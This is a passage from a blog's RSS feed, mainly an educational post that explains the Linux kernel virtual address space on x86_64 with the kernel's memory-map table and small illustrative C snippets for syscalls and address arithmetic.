<p>Sitting above the buddy allocator, the slab allocator is another fundamental aspect of memory allocation and management in the Linux kernel, addressing the internal fragmentation problems of the buddy allocator - but that&rsquo;s for next time!</p>
<p>Thanks for reading, and as always feel free to <a href="https://twitter.com/sam4k1">@me</a> if you have any questions, suggestions or corrections :)</p>
<p>exit(0);</p>
]]></content:encoded></item><item><title>Linternals: The Kernel Virtual Address Space</title><description>In this part of our journey into virtual memory in Linux, we cover the mystical kernel memory map and all it entails.</description><link>https://sam4k.com/linternals-virtual-memory-part-3/</link><guid isPermaLink="false">623768ce1b5b6d052837b4de</guid><category>linux</category><category>kernel</category><category>memory</category><dc:creator>sam4k</dc:creator><pubDate>Tue, 10 May 2022 19:30:00 +0000</pubDate><media:content url="https://sam4k.com/content/images/2022/04/linternals-1.gif" medium="image"/><content:encoded><![CDATA[<p>Alright, we really made it to part 3 eh? Not bad! Before we dive straight in, let&rsquo;s quickly go over what we covered in the <a href="https://sam4k.com/linternals-virtual-memory-0x02/">last part</a> on the user virtual address space:</p>
<ul>
<li>Very brief overview, with some examples, of using <code>procfs</code> for introspection</li>
<li>The various mappings that make up a typical user virtual address space</li>
<li>Which syscalls userspace programs make use of to set up their virtual address space</li>
<li>Finally tying up some extras with how threading &amp; ASLR fit into this picture</li>
</ul>
<p>This time we&rsquo;ll be pivoting our attention towards the omnipresent kernel virtual address space, where all the true power resides, so let&rsquo;s get stuck into chapter 5!</p>
<p><img src="https://sam4k.com/content/images/2022/04/unlimited_power.gif" alt=""></p>
<h2 id="contents">Contents</h2>
<ul>
<li><a href="#0x05-kernel-virtual-address-space">0x05 Kernel Virtual Address Space</a>
<ul>
<li><a href="#one-mapping-to-rule-them-all">One Mapping To Rule Them All</a></li>
<li><a href="#kernel-virtual-memory-map">Kernel Virtual Memory Map</a></li>
<li><a href="#wrapping-up">Wrapping Up</a>
<ul>
<li><a href="#digging-deeper">Digging Deeper</a></li>
</ul>
</li>
</ul>
</li>
<li><a href="#next-time">Next Time!</a></li>
</ul>
<h2 id="0x05-kernel-virtual-address-space">0x05 Kernel Virtual Address Space</h2>
<p>Casting our minds back to <a href="https://sam4k.com/linternals-virtual-memory-part-1/">part 1</a>, we&rsquo;ll recall that:</p>
<ul>
<li>Each process has its own, sandboxed virtual address space (VAS)</li>
<li>The VAS is vast, spanning all addressable memory</li>
<li>This VAS is split between the User VAS &amp; Kernel VAS[1]</li>
</ul>
<p>As we touched on in part 1, and more so in part 2, to even set up its user VAS a process needs the kernel to carry out a series of syscalls (<code>brk()</code>, <code>mmap()</code>, <code>execve()</code> etc.)[2].</p>
<p>This is because our userspace is running in usermode (i.e. unprivileged code execution) and only the kernel is able to carry out important, system-altering stuff (right??).</p>
<p>So if we&rsquo;re in usermode and we need the kernel to do something, like <code>mmap()</code> some memory for us, then we need to ask the kernel to do it for us and we do this via syscalls.</p>
<p>Essentially, a syscall acts as an interface between usermode and kernelmode (privileged code execution), only allowing a couple of things to cross over from usermode: the syscall number &amp; its arguments.</p>
<p><img src="https://sam4k.com/content/images/2022/05/image.png" alt=""></p>
<p>This way the kernel can look up the function corresponding to the syscall number and sanitise the arguments (the userspace has no power here after all). If everything looks good, it carries out the privileged work and returns to the syscall handler, which transitions back to usermode, only allowing one thing to cross over: the result of the syscall.</p>
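<p>If you want to see that boundary from the userspace side, here&rsquo;s a minimal sketch, assuming Linux with glibc, which provides the generic <code>syscall()</code> wrapper and the <code>SYS_*</code> numbers. The helper names <code>raw_getpid()</code> and <code>raw_close_bad_fd()</code> are made up for illustration. All we hand over is a syscall number plus arguments, and all we get back is a result (or an error):</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-C" data-lang="C">#define _GNU_SOURCE
#include &lt;errno.h&gt;
#include &lt;stdio.h&gt;
#include &lt;sys/syscall.h&gt;
#include &lt;unistd.h&gt;

/* Hypothetical helper: pass only a syscall number across, get the result back. */
static long raw_getpid(void)
{
    return syscall(SYS_getpid);
}

/* Hypothetical helper: hand the kernel a bogus fd; it checks the argument and refuses. */
static int raw_close_bad_fd(void)
{
    errno = 0;
    if (syscall(SYS_close, -1) == -1)
        return errno;
    return 0;
}

int main(void)
{
    printf("raw getpid: %ld, libc getpid: %ld\n", raw_getpid(), (long)getpid());
    printf("close(-1) failed with errno %d (EBADF is %d)\n",
           raw_close_bad_fd(), EBADF);
    return 0;
}
</code></pre></div><p>The second call is the &ldquo;sanitise the arguments&rdquo; step in action: the kernel looks up the fd, finds nothing there and returns an error instead of doing any work.</p>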
<p><img src="https://sam4k.com/content/images/2022/04/where_you_going.gif" alt=""></p>
<p>This is all a roundabout way of broaching the question: we understand the userspace, but when we make a syscall[3], what is it running and how does it know where to find it?</p>
<p>And THAT is where the kernel virtual address space comes in. Got there eventually, right?</p>
<hr>
<ol>
<li>The VAS is often so vast (e.g. on 64-bit systems) that, rather than splitting the entire address space, an upper &amp; lower portion are assigned to the kernel and user respectively, with the majority in between being non-canonical/unused addresses.</li>
<li>We touched more on syscalls back in part 1, <a href="https://sam4k.com/linternals-virtual-memory-part-1/#user-mode-kernel-mode">&ldquo;User-mode &amp; Kernel-mode&rdquo;</a></li>
<li>In the future I might dedicate a full post (or 3 lol) to the syscall interface, so if that&rsquo;s something you&rsquo;d be into, feel free to poke me on <a href="https://twitter.com/sam4k1">Twitter</a></li>
</ol>
<h3 id="one-mapping-to-rule-them-all">One Mapping To Rule Them All</h3>
<p>Okay, so I know we&rsquo;re all eager to dig around the kernel VAS, but it&rsquo;s worth noting a fairly fundamental difference here: while each process has its own unique user VAS, <strong>they all share the same kernel VAS</strong>.</p>
<p>Huh? What exactly does this mean? Well, to put it simply, all our processes are interacting with the same kernel, so each process&rsquo;s kernel VAS maps to the same physical memory.</p>
<p>As such, any changes within the kernel will be reflected across all processes. It&rsquo;s important to note, and we&rsquo;ll cover the why in more detail later, that when we&rsquo;re in usermode we have no read/write access to this kernel virtual address space.</p>
<p>This is an extremely high-level overview of the topic and the actual details will vary based on architecture &amp; security mitigations, but for now just remember that all processes share the same kernel VAS.</p>
<h3 id="kernel-virtual-memory-map">Kernel Virtual Memory Map</h3>
<p><img src="https://sam4k.com/content/images/2022/04/andsoitbegins.gif" alt=""></p>
<p>Unfortunately things aren&rsquo;t going to be as tidy and straightforward as our tour of the user virtual address space. The contents of kernelspace vary depending on architecture and there isn&rsquo;t any easy-to-visualise introspection via <code>procfs</code>.</p>
<p>As I&rsquo;ve mentioned before in Linternals, I&rsquo;ll be focusing on <code>x86_64</code> when architecture specifics come into play. So although we don&rsquo;t have <code>procfs</code>, we do have kernel docs!</p>
<p><a href="https://www.kernel.org/doc/Documentation/x86/x86_64/mm.txt"><code>Documentation/x86/x86_64/mm.txt</code></a>, specifically, provides a <code>/proc/self/maps</code>-esque breakdown of the <code>x86_64</code> virtual memory map, including both UVAS &amp; KVAS, which is perfect for us[1]:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-gdscript3" data-lang="gdscript3"><span class="line"><span class="cl"><span class="o">========================================================================================================================</span>
</span></span><span class="line"><span class="cl">    <span class="n">Start</span> <span class="n">addr</span>    <span class="o">|</span>   <span class="n">Offset</span>   <span class="o">|</span>     <span class="n">End</span> <span class="n">addr</span>     <span class="o">|</span>  <span class="n">Size</span>   <span class="o">|</span> <span class="n">VM</span> <span class="n">area</span> <span class="n">description</span>
</span></span><span class="line"><span class="cl"><span class="o">========================================================================================================================</span>
</span></span><span class="line"><span class="cl">                  <span class="o">|</span>            <span class="o">|</span>                  <span class="o">|</span>         <span class="o">|</span>
</span></span><span class="line"><span class="cl"> <span class="mi">0000000000000000</span> <span class="o">|</span>    <span class="mi">0</span>       <span class="o">|</span> <span class="mi">00007</span><span class="n">fffffffffff</span> <span class="o">|</span>  <span class="mi">128</span> <span class="n">TB</span> <span class="o">|</span> <span class="n">user</span><span class="o">-</span><span class="n">space</span> <span class="n">virtual</span> <span class="n">memory</span><span class="p">,</span> <span class="n">different</span> <span class="n">per</span> <span class="n">mm</span>
</span></span><span class="line"><span class="cl"><span class="n">__________________</span><span class="o">|</span><span class="n">____________</span><span class="o">|</span><span class="n">__________________</span><span class="o">|</span><span class="n">_________</span><span class="o">|</span><span class="n">___________________________________________________________</span>
</span></span><span class="line"><span class="cl">                  <span class="o">|</span>            <span class="o">|</span>                  <span class="o">|</span>         <span class="o">|</span>
</span></span><span class="line"><span class="cl"> <span class="mi">0000800000000000</span> <span class="o">|</span> <span class="o">+</span><span class="mi">128</span>    <span class="n">TB</span> <span class="o">|</span> <span class="n">ffff7fffffffffff</span> <span class="o">|</span> <span class="o">~</span><span class="mi">16</span><span class="n">M</span> <span class="n">TB</span> <span class="o">|</span> <span class="o">...</span> <span class="n">huge</span><span class="p">,</span> <span class="n">almost</span> <span class="mi">64</span> <span class="n">bits</span> <span class="n">wide</span> <span class="n">hole</span> <span class="n">of</span> <span class="n">non</span><span class="o">-</span><span class="n">canonical</span>
</span></span><span class="line"><span class="cl">                  <span class="o">|</span>            <span class="o">|</span>                  <span class="o">|</span>         <span class="o">|</span>     <span class="n">virtual</span> <span class="n">memory</span> <span class="n">addresses</span> <span class="n">up</span> <span class="n">to</span> <span class="n">the</span> <span class="o">-</span><span class="mi">128</span> <span class="n">TB</span>
</span></span><span class="line"><span class="cl">                  <span class="o">|</span>            <span class="o">|</span>                  <span class="o">|</span>         <span class="o">|</span>     <span class="n">starting</span> <span class="n">offset</span> <span class="n">of</span> <span class="n">kernel</span> <span class="n">mappings</span><span class="o">.</span>
</span></span><span class="line"><span class="cl"><span class="n">__________________</span><span class="o">|</span><span class="n">____________</span><span class="o">|</span><span class="n">__________________</span><span class="o">|</span><span class="n">_________</span><span class="o">|</span><span class="n">___________________________________________________________</span>
</span></span><span class="line"><span class="cl">                                                            <span class="o">|</span>
</span></span><span class="line"><span class="cl">                                                            <span class="o">|</span> <span class="n">Kernel</span><span class="o">-</span><span class="n">space</span> <span class="n">virtual</span> <span class="n">memory</span><span class="p">,</span> <span class="n">shared</span> <span class="n">between</span> <span class="n">all</span> <span class="n">processes</span><span class="p">:</span>
</span></span><span class="line"><span class="cl"><span class="n">____________________________________________________________</span><span class="o">|</span><span class="n">___________________________________________________________</span>
</span></span><span class="line"><span class="cl">                  <span class="o">|</span>            <span class="o">|</span>                  <span class="o">|</span>         <span class="o">|</span>
</span></span><span class="line"><span class="cl"> <span class="n">ffff800000000000</span> <span class="o">|</span> <span class="o">-</span><span class="mi">128</span>    <span class="n">TB</span> <span class="o">|</span> <span class="n">ffff87ffffffffff</span> <span class="o">|</span>    <span class="mi">8</span> <span class="n">TB</span> <span class="o">|</span> <span class="o">...</span> <span class="n">guard</span> <span class="n">hole</span><span class="p">,</span> <span class="n">also</span> <span class="n">reserved</span> <span class="k">for</span> <span class="n">hypervisor</span>
</span></span><span class="line"><span class="cl"> <span class="n">ffff880000000000</span> <span class="o">|</span> <span class="o">-</span><span class="mi">120</span>    <span class="n">TB</span> <span class="o">|</span> <span class="n">ffff887fffffffff</span> <span class="o">|</span>  <span class="mf">0.5</span> <span class="n">TB</span> <span class="o">|</span> <span class="n">LDT</span> <span class="n">remap</span> <span class="k">for</span> <span class="n">PTI</span>
</span></span><span class="line"><span class="cl"> <span class="n">ffff888000000000</span> <span class="o">|</span> <span class="o">-</span><span class="mf">119.5</span>  <span class="n">TB</span> <span class="o">|</span> <span class="n">ffffc87fffffffff</span> <span class="o">|</span>   <span class="mi">64</span> <span class="n">TB</span> <span class="o">|</span> <span class="n">direct</span> <span class="n">mapping</span> <span class="n">of</span> <span class="n">all</span> <span class="n">physical</span> <span class="n">memory</span> <span class="p">(</span><span class="n">page_offset_base</span><span class="p">)</span>
</span></span><span class="line"><span class="cl"> <span class="n">ffffc88000000000</span> <span class="o">|</span>  <span class="o">-</span><span class="mf">55.5</span>  <span class="n">TB</span> <span class="o">|</span> <span class="n">ffffc8ffffffffff</span> <span class="o">|</span>  <span class="mf">0.5</span> <span class="n">TB</span> <span class="o">|</span> <span class="o">...</span> <span class="n">unused</span> <span class="n">hole</span>
</span></span><span class="line"><span class="cl"> <span class="n">ffffc90000000000</span> <span class="o">|</span>  <span class="o">-</span><span class="mi">55</span>    <span class="n">TB</span> <span class="o">|</span> <span class="n">ffffe8ffffffffff</span> <span class="o">|</span>   <span class="mi">32</span> <span class="n">TB</span> <span class="o">|</span> <span class="n">vmalloc</span><span class="o">/</span><span class="n">ioremap</span> <span class="n">space</span> <span class="p">(</span><span class="n">vmalloc_base</span><span class="p">)</span>
</span></span><span class="line"><span class="cl"> <span class="n">ffffe90000000000</span> <span class="o">|</span>  <span class="o">-</span><span class="mi">23</span>    <span class="n">TB</span> <span class="o">|</span> <span class="n">ffffe9ffffffffff</span> <span class="o">|</span>    <span class="mi">1</span> <span class="n">TB</span> <span class="o">|</span> <span class="o">...</span> <span class="n">unused</span> <span class="n">hole</span>
</span></span><span class="line"><span class="cl"> <span class="n">ffffea0000000000</span> <span class="o">|</span>  <span class="o">-</span><span class="mi">22</span>    <span class="n">TB</span> <span class="o">|</span> <span class="n">ffffeaffffffffff</span> <span class="o">|</span>    <span class="mi">1</span> <span class="n">TB</span> <span class="o">|</span> <span class="n">virtual</span> <span class="n">memory</span> <span class="n">map</span> <span class="p">(</span><span class="n">vmemmap_base</span><span class="p">)</span>
</span></span><span class="line"><span class="cl"> <span class="n">ffffeb0000000000</span> <span class="o">|</span>  <span class="o">-</span><span class="mi">21</span>    <span class="n">TB</span> <span class="o">|</span> <span class="n">ffffebffffffffff</span> <span class="o">|</span>    <span class="mi">1</span> <span class="n">TB</span> <span class="o">|</span> <span class="o">...</span> <span class="n">unused</span> <span class="n">hole</span>
</span></span><span class="line"><span class="cl"> <span class="n">ffffec0000000000</span> <span class="o">|</span>  <span class="o">-</span><span class="mi">20</span>    <span class="n">TB</span> <span class="o">|</span> <span class="n">fffffbffffffffff</span> <span class="o">|</span>   <span class="mi">16</span> <span class="n">TB</span> <span class="o">|</span> <span class="n">KASAN</span> <span class="n">shadow</span> <span class="n">memory</span>
</span></span><span class="line"><span class="cl"><span class="n">__________________</span><span class="o">|</span><span class="n">____________</span><span class="o">|</span><span class="n">__________________</span><span class="o">|</span><span class="n">_________</span><span class="o">|</span><span class="n">____________________________________________________________</span>
</span></span><span class="line"><span class="cl">                                                            <span class="o">|</span>
</span></span><span class="line"><span class="cl">                                                            <span class="o">|</span> <span class="n">Identical</span> <span class="n">layout</span> <span class="n">to</span> <span class="n">the</span> <span class="mi">56</span><span class="o">-</span><span class="n">bit</span> <span class="n">one</span> <span class="n">from</span> <span class="n">here</span> <span class="n">on</span><span class="p">:</span>
</span></span><span class="line"><span class="cl"><span class="n">____________________________________________________________</span><span class="o">|</span><span class="n">____________________________________________________________</span>
</span></span><span class="line"><span class="cl">                  <span class="o">|</span>            <span class="o">|</span>                  <span class="o">|</span>         <span class="o">|</span>
</span></span><span class="line"><span class="cl"> <span class="n">fffffc0000000000</span> <span class="o">|</span>   <span class="o">-</span><span class="mi">4</span>    <span class="n">TB</span> <span class="o">|</span> <span class="n">fffffdffffffffff</span> <span class="o">|</span>    <span class="mi">2</span> <span class="n">TB</span> <span class="o">|</span> <span class="o">...</span> <span class="n">unused</span> <span class="n">hole</span>
</span></span><span class="line"><span class="cl">                  <span class="o">|</span>            <span class="o">|</span>                  <span class="o">|</span>         <span class="o">|</span> <span class="n">vaddr_end</span> <span class="k">for</span> <span class="n">KASLR</span>
</span></span><span class="line"><span class="cl"> <span class="n">fffffe0000000000</span> <span class="o">|</span>   <span class="o">-</span><span class="mi">2</span>    <span class="n">TB</span> <span class="o">|</span> <span class="n">fffffe7fffffffff</span> <span class="o">|</span>  <span class="mf">0.5</span> <span class="n">TB</span> <span class="o">|</span> <span class="n">cpu_entry_area</span> <span class="n">mapping</span>
</span></span><span class="line"><span class="cl"> <span class="n">fffffe8000000000</span> <span class="o">|</span>   <span class="o">-</span><span class="mf">1.5</span>  <span class="n">TB</span> <span class="o">|</span> <span class="n">fffffeffffffffff</span> <span class="o">|</span>  <span class="mf">0.5</span> <span class="n">TB</span> <span class="o">|</span> <span class="o">...</span> <span class="n">unused</span> <span class="n">hole</span>
</span></span><span class="line"><span class="cl"> <span class="n">ffffff0000000000</span> <span class="o">|</span>   <span class="o">-</span><span class="mi">1</span>    <span class="n">TB</span> <span class="o">|</span> <span class="n">ffffff7fffffffff</span> <span class="o">|</span>  <span class="mf">0.5</span> <span class="n">TB</span> <span class="o">|</span> <span class="o">%</span><span class="n">esp</span> <span class="n">fixup</span> <span class="n">stacks</span>
</span></span><span class="line"><span class="cl"> <span class="n">ffffff8000000000</span> <span class="o">|</span> <span class="o">-</span><span class="mi">512</span>    <span class="n">GB</span> <span class="o">|</span> <span class="n">ffffffeeffffffff</span> <span class="o">|</span>  <span class="mi">444</span> <span class="n">GB</span> <span class="o">|</span> <span class="o">...</span> <span class="n">unused</span> <span class="n">hole</span>
</span></span><span class="line"><span class="cl"> <span class="n">ffffffef00000000</span> <span class="o">|</span>  <span class="o">-</span><span class="mi">68</span>    <span class="n">GB</span> <span class="o">|</span> <span class="n">fffffffeffffffff</span> <span class="o">|</span>   <span class="mi">64</span> <span class="n">GB</span> <span class="o">|</span> <span class="n">EFI</span> <span class="n">region</span> <span class="n">mapping</span> <span class="n">space</span>
</span></span><span class="line"><span class="cl"> <span class="n">ffffffff00000000</span> <span class="o">|</span>   <span class="o">-</span><span class="mi">4</span>    <span class="n">GB</span> <span class="o">|</span> <span class="n">ffffffff7fffffff</span> <span class="o">|</span>    <span class="mi">2</span> <span class="n">GB</span> <span class="o">|</span> <span class="o">...</span> <span class="n">unused</span> <span class="n">hole</span>
</span></span><span class="line"><span class="cl"> <span class="n">ffffffff80000000</span> <span class="o">|</span>   <span class="o">-</span><span class="mi">2</span>    <span class="n">GB</span> <span class="o">|</span> <span class="n">ffffffff9fffffff</span> <span class="o">|</span>  <span class="mi">512</span> <span class="n">MB</span> <span class="o">|</span> <span class="n">kernel</span> <span class="n">text</span> <span class="n">mapping</span><span class="p">,</span> <span class="n">mapped</span> <span class="n">to</span> <span class="n">physical</span> <span class="n">address</span> <span class="mi">0</span>
</span></span><span class="line"><span class="cl"> <span class="n">ffffffff80000000</span> <span class="o">|-</span><span class="mi">2048</span>    <span class="n">MB</span> <span class="o">|</span>                  <span class="o">|</span>         <span class="o">|</span>
</span></span><span class="line"><span class="cl"> <span class="n">ffffffffa0000000</span> <span class="o">|-</span><span class="mi">1536</span>    <span class="n">MB</span> <span class="o">|</span> <span class="n">fffffffffeffffff</span> <span class="o">|</span> <span class="mi">1520</span> <span class="n">MB</span> <span class="o">|</span> <span class="n">module</span> <span class="n">mapping</span> <span class="n">space</span>
</span></span><span class="line"><span class="cl"> <span class="n">ffffffffff000000</span> <span class="o">|</span>  <span class="o">-</span><span class="mi">16</span>    <span class="n">MB</span> <span class="o">|</span>                  <span class="o">|</span>         <span class="o">|</span>
</span></span><span class="line"><span class="cl">    <span class="n">FIXADDR_START</span> <span class="o">|</span> <span class="o">~-</span><span class="mi">11</span>    <span class="n">MB</span> <span class="o">|</span> <span class="n">ffffffffff5fffff</span> <span class="o">|</span> <span class="o">~</span><span class="mf">0.5</span> <span class="n">MB</span> <span class="o">|</span> <span class="n">kernel</span><span class="o">-</span><span class="n">internal</span> <span class="n">fixmap</span> <span class="nb">range</span><span class="p">,</span> <span class="n">variable</span> <span class="n">size</span> <span class="ow">and</span> <span class="n">offset</span>
</span></span><span class="line"><span class="cl"> <span class="n">ffffffffff600000</span> <span class="o">|</span>  <span class="o">-</span><span class="mi">10</span>    <span class="n">MB</span> <span class="o">|</span> <span class="n">ffffffffff600fff</span> <span class="o">|</span>    <span class="mi">4</span> <span class="n">kB</span> <span class="o">|</span> <span class="n">legacy</span> <span class="n">vsyscall</span> <span class="n">ABI</span>
</span></span><span class="line"><span class="cl"> <span class="n">ffffffffffe00000</span> <span class="o">|</span>   <span class="o">-</span><span class="mi">2</span>    <span class="n">MB</span> <span class="o">|</span> <span class="n">ffffffffffffffff</span> <span class="o">|</span>    <span class="mi">2</span> <span class="n">MB</span> <span class="o">|</span> <span class="o">...</span> <span class="n">unused</span> <span class="n">hole</span>
</span></span><span class="line"><span class="cl"><span class="n">__________________</span><span class="o">|</span><span class="n">____________</span><span class="o">|</span><span class="n">__________________</span><span class="o">|</span><span class="n">_________</span><span class="o">|</span><span class="n">___________________________________________________________</span>
</span></span></code></pre></div><p><strong>Line 5</strong>: We&rsquo;ve touched on this previously: the lower portion of our virtual address space[2] makes up the userspace. Size varies per architecture.</p>
<p><strong>Line 8</strong>: Remember how the virtual address space spans every possible address, which is A LOT? As a result, the majority of this is non-canonical, unused space.</p>
<p><strong>Line 16</strong>: My understanding is the guard hole initially existed to prevent accidental accesses to the non-canonical region (which would cause trouble); nowadays the space is also used to load hypervisors into.</p>
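<p>To make &ldquo;canonical&rdquo; a bit more concrete, here&rsquo;s a minimal sketch in C, assuming 4-level paging on <code>x86_64</code> (so 48 implemented address bits). The helper name <code>is_canonical()</code> is made up for illustration; all it does is check that bits 47-63 are copies of one another:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-C" data-lang="C">#include &lt;stdbool.h&gt;
#include &lt;stdint.h&gt;

/* Assumption: 4-level paging, so 48 bits of virtual address are implemented. */
#define VA_BITS 48

/* Hypothetical helper: true if bits 47..63 are all 0 or all 1. */
static bool is_canonical(uint64_t addr)
{
    uint64_t upper = addr &gt;&gt; (VA_BITS - 1); /* keep bits 47..63 (17 bits) */

    return upper == 0 || upper == 0x1ffff;
}
</code></pre></div><p>So <code>0x00007fffffffffff</code> (top of userspace) and <code>0xffff800000000000</code> (bottom of kernelspace) pass the check, while everything in between fails it.</p>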
<p><strong>Line 17</strong>: This will make more sense after we cover virtual memory implementation, but the per-process Local Descriptor Table describes private memory descriptor segments<a href="https://en-academic.com/dic.nsf/enwiki/1553430">[3]</a>.</p>
<p>When Page Table Isolation (a mitigation, see below) is enabled, the LDT is mapped to this kernelspace region to mitigate the contents being accessed by attackers.</p>
<p><strong>Line 18</strong>: Defined by <code>__PAGE_OFFSET_BASE</code>, the &ldquo;physmap&rdquo; (aka lowmem) can be seen as the start of the kernelspace proper. It is used as a 1:1 mapping of physical memory.</p>
<p>To recap, virtual addresses can be mapped to somewhere in physical memory. E.g. if we load a library into our virtual address space, the virtual address it&rsquo;s been mapped to actually points to some physical memory where that&rsquo;s been loaded to.</p>
<p>In another process, with its own virtual address space, that same virtual address may be mapped to a completely different physical memory address.</p>
<p>Unlike typical virtual addresses (we&rsquo;ll touch on how they&rsquo;re translated), addresses in the physmap region are called kernel logical addresses. Any given kernel logical address is a fixed offset (<a href="https://elixir.bootlin.com/linux/v5.17.5/source/arch/x86/include/asm/page_types.h#L36"><code>PAGE_OFFSET</code></a>) from the corresponding physical address.</p>
<p>E.g. <code>PAGE_OFFSET == physical address 0x00</code>, <code>PAGE_OFFSET+0x01 == physical address 0x01</code> etc. etc.</p>
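<p>As a rough sketch of that arithmetic in C: the base below is an assumption (the default 4-level physmap base with KASLR disabled; with KASLR the real one is randomised at boot), and the helper names are hypothetical stand-ins rather than the kernel&rsquo;s own conversion helpers:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-C" data-lang="C">#include &lt;stdint.h&gt;

/*
 * Assumption: default 4-level physmap base with KASLR disabled; with KASLR
 * the real base is randomised at boot.
 */
#define PAGE_OFFSET 0xffff888000000000ULL

/* Illustrative stand-ins for the kernel's phys/virt conversion helpers. */
static uint64_t phys_to_logical(uint64_t paddr)
{
    return paddr + PAGE_OFFSET;
}

static uint64_t logical_to_phys(uint64_t vaddr)
{
    return vaddr - PAGE_OFFSET;
}
</code></pre></div><p>The point is just that no page table walk is needed to reason about these addresses: knowing one side and the offset gives you the other.</p>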
<p><img src="https://sam4k.com/content/images/2022/05/confused_larry.gif" alt=""></p>
<p><strong>Line 19</strong>: Not much more to say about these, other than it&rsquo;s an unused region!</p>
<p><strong>Line 20</strong><a href="https://www.oreilly.com/library/view/linux-device-drivers/0596000081/ch07s04.html">[4]</a>: Defined by <code>VMALLOC_START</code> and <code>VMALLOC_END</code>, this virtual memory region is reserved for non-contiguous physical memory allocations via the <a href="https://elixir.bootlin.com/linux/v5.17.5/source/include/linux/vmalloc.h#L146"><code>vmalloc()</code></a> family of kernel functions (aka highmem region).</p>
<p>This is similar to how we initially understood virtual memory, where two contiguous virtual addresses in the <code>vmalloc</code> region may not necessarily map to two contiguous physical memory addresses (unlike physmap which we just covered).  </p>
<p>This region is also used by <a href="https://elixir.bootlin.com/linux/v5.17.5/source/arch/x86/include/asm/io.h#L207"><code>ioremap()</code></a>, which doesn&rsquo;t actually allocate physical memory like <code>vmalloc()</code> but instead allows you to map a specified physical address range. E.g. allocating virtual memory to map I/O stuff for your GPU.</p>
<p>To oversimplify (we&rsquo;ll expand on this later): because translation in this region isn&rsquo;t simply <code>physical address = logical address - PAGE_OFFSET</code>, there&rsquo;s more overhead behind the scenes when using <code>vmalloc()</code>, which uses virtual addressing, than, say, <code>kmalloc()</code>, which returns addresses from the physmap region.</p>
<p><strong>Line 21</strong>: Another unused memory region!</p>
<p><strong>Line 22</strong><a href="https://blogs.oracle.com/linux/post/minimizing-struct-page-overhead">[5]</a>: Defined by <a href="https://elixir.bootlin.com/linux/v5.17.5/source/arch/x86/include/asm/pgtable_64_types.h#L135"><code>VMEMMAP_START</code></a>, this region is used by the <a href="https://www.kernel.org/doc/html/latest/vm/memory-model.html"><code>SPARSEMEM</code></a> memory model in Linux to map the <code>vmemmap</code>. This is a global array, in virtual memory, that indexes all the chunks (pages) of memory currently tracked by the kernel.</p>
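<p>Since the <code>vmemmap</code> is an array of <code>struct page</code> indexed by page frame number, finding the entry for a physical address is plain array arithmetic. Here&rsquo;s a hedged sketch in C; the base address (non-KASLR, 4-level), the 4 KiB page size and the 64-byte <code>struct page</code> are all assumptions that depend on your kernel config, and the helper name is hypothetical:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-C" data-lang="C">#include &lt;stdint.h&gt;

/* Assumptions: non-KASLR 4-level vmemmap base, 4 KiB pages, 64-byte struct page. */
#define VMEMMAP_START    0xffffea0000000000ULL
#define PAGE_SHIFT       12
#define STRUCT_PAGE_SIZE 64ULL

/* Hypothetical helper: where the struct page for a physical address would live. */
static uint64_t phys_to_struct_page(uint64_t paddr)
{
    uint64_t pfn = paddr &gt;&gt; PAGE_SHIFT; /* page frame number */

    return VMEMMAP_START + pfn * STRUCT_PAGE_SIZE;
}
</code></pre></div><p>Under those assumptions, the page at physical address <code>0x1000</code> (PFN 1) is described by the second array entry, 64 bytes past the base.</p>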
<p><strong>Line 23</strong>: Aaand another unused memory region!</p>
<p><strong>Line 24</strong><a href="https://www.kernel.org/doc/html/latest/dev-tools/kasan.html">[6]</a>: The Kernel Address Sanitiser (KASAN) is a dynamic memory error detector, used for finding use-after-free and out-of-bounds bugs. When enabled, <code>CONFIG_KASAN=y</code>, this region is used as shadow memory by KASAN.</p>
<p>This basically means KASAN uses this shadow memory to track the state of the rest of memory (e.g. which bytes are currently valid to access), which it can then check on later accesses to make sure there&rsquo;s no shenanigans or undefined behaviour going on.</p>
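<p>For the curious, the mapping from an address to its shadow byte is a shift and an add. The sketch below assumes generic KASAN on <code>x86_64</code> with 4-level paging, where one shadow byte covers 8 bytes of memory; the constants are my assumptions for that setup and the function name is illustrative:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-C" data-lang="C">#include &lt;stdint.h&gt;

/* Assumptions: generic KASAN on x86_64 with 4-level paging. */
#define KASAN_SHADOW_SCALE_SHIFT 3 /* 8 bytes of memory per shadow byte */
#define KASAN_SHADOW_OFFSET      0xdffffc0000000000ULL

/* Illustrative helper: address of the shadow byte covering addr. */
static uint64_t mem_to_shadow(uint64_t addr)
{
    return (addr &gt;&gt; KASAN_SHADOW_SCALE_SHIFT) + KASAN_SHADOW_OFFSET;
}
</code></pre></div><p>Any 8 neighbouring bytes that share an aligned 8-byte granule end up sharing a single shadow byte, which is why the shadow region is roughly an eighth the size of what it covers.</p>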
<p><strong>Line 30</strong>: You get the idea, unused.</p>
<p><strong>Line 31</strong>: Straight from the comments, defined by <a href="https://elixir.bootlin.com/linux/v5.17.5/source/arch/x86/include/asm/pgtable_64_types.h#L157"><code>CPU_ENTRY_AREA_BASE</code></a>, &ldquo;<em>cpu_entry_area is a percpu region that contains things needed by the CPU and early entry/exit code</em>&rdquo;<a href="https://elixir.bootlin.com/linux/v5.17.5/source/arch/x86/include/asm/cpu_entry_area.h#L90">[7]</a>. The <a href="https://elixir.bootlin.com/linux/v5.17.5/source/arch/x86/include/asm/cpu_entry_area.h#L90"><code>struct cpu_entry_area</code></a> can share more insights on its role.</p>
<p><code>CPU_ENTRY_AREA_BASE</code> is also used by <a href="https://elixir.bootlin.com/linux/v5.17.5/source/arch/x86/mm/kaslr.c#L41"><code>vaddr_end</code></a>, which along with <code>vaddr_start</code> marks the virtual address range for Kernel Address Space Layout Randomization (KASLR).</p>
<p><strong>Line 32</strong>: Yep, unused region.</p>
<p><img src="https://sam4k.com/content/images/2022/05/theresmore.gif" alt=""></p>
<p><strong>Line 33</strong>: Enabled with <code>CONFIG_X86_ESPFIX64=y</code>, this region is used to, and I honestly don&rsquo;t blame you if this makes no sense yet, fix issues with returning from kernelspace to userspace when using a 16-bit stack&hellip;</p>
<p>Again, the comments can be insightful here, so feel free to take a gander at the implementation in <a href="https://elixir.bootlin.com/linux/latest/source/arch/x86/kernel/espfix_64.c"><code>arch/x86/kernel/espfix_64.c</code></a>.</p>
<p><strong>Line 34</strong>: Another unused region.</p>
